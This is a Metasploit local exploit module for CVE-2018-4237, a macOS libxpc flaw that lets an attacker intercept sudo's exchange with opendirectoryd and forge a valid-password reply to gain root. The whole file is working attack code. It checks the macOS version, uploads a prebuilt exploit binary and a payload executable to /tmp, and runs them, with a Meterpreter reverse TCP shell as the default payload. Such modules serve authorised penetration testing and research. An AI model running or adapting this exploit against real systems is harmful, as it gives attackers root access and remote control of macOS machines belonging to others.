1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::OSX::Priv
11
  include Msf::Post::OSX::System
12
  include Msf::Exploit::EXE
13
  include Msf::Exploit::FileDropper
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'Mac OS X libxpc MITM Privilege Escalation',
20
        'Description' => %q{
21
          This module exploits a vulnerablity in libxpc on macOS <= 10.13.3
22
          The task_set_special_port API allows callers to overwrite their bootstrap port,
23
          which is used to communicate with launchd. This port is inherited across forks:
24
          child processes will use the same bootstrap port as the parent.
25
          By overwriting the bootstrap port and forking a child processes, we can now gain
26
          a MitM position between our child and launchd.
27

28
          To gain root we target the sudo binary and intercept its communication with
29
          opendirectoryd, which is used by sudo to verify credentials. We modify the
30
          replies from opendirectoryd to make it look like our password was valid.
31
        },
32
        'License' => MSF_LICENSE,
33
        'Author' => [ 'saelo' ],
34
        'References' => [
35
          ['CVE', '2018-4237'],
36
          ['URL', 'https://github.com/saelo/pwn2own2018'],
37
        ],
38
        'Arch' => [ ARCH_X64 ],
39
        'Platform' => 'osx',
40
        'DefaultTarget' => 0,
41
        'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
42
        'Targets' => [
43
          [ 'Mac OS X x64 (Native Payload)', {} ]
44
        ],
45
        'DisclosureDate' => '2018-03-15',
46
        'Notes' => {
47
          'Reliability' => UNKNOWN_RELIABILITY,
48
          'Stability' => UNKNOWN_STABILITY,
49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
        }
51
      )
52
    )
53
    register_advanced_options [
54
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
55
    ]
56
  end
57

58
  def upload_executable_file(filepath, filedata)
59
    print_status("Uploading file: '#{filepath}'")
60
    write_file(filepath, filedata)
61
    chmod(filepath)
62
    register_file_for_cleanup(filepath)
63
  end
64

65
  def check
66
    version = Rex::Version.new(get_system_version)
67
    if version >= Rex::Version.new('10.13.4')
68
      CheckCode::Safe
69
    else
70
      CheckCode::Appears
71
    end
72
  end
73

74
  def exploit
75
    if check != CheckCode::Appears
76
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
77
    end
78

79
    if is_root?
80
      fail_with Failure::BadConfig, 'Session already has root privileges'
81
    end
82

83
    unless writable? datastore['WritableDir']
84
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
85
    end
86

87
    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2018-4237", "ssudo"))
88
    exploit_file = "#{datastore['WritableDir']}/#{Rex::Text::rand_text_alpha_lower(6..12)}"
89
    upload_executable_file(exploit_file, exploit_data)
90
    payload_file = "#{datastore['WritableDir']}/#{Rex::Text::rand_text_alpha_lower(6..12)}"
91
    upload_executable_file(payload_file, generate_payload_exe)
92
    exploit_cmd = "#{exploit_file} #{payload_file}"
93
    print_status("Executing cmd '#{exploit_cmd}'")
94
    cmd_exec(exploit_cmd)
95
  end
96
end
97

98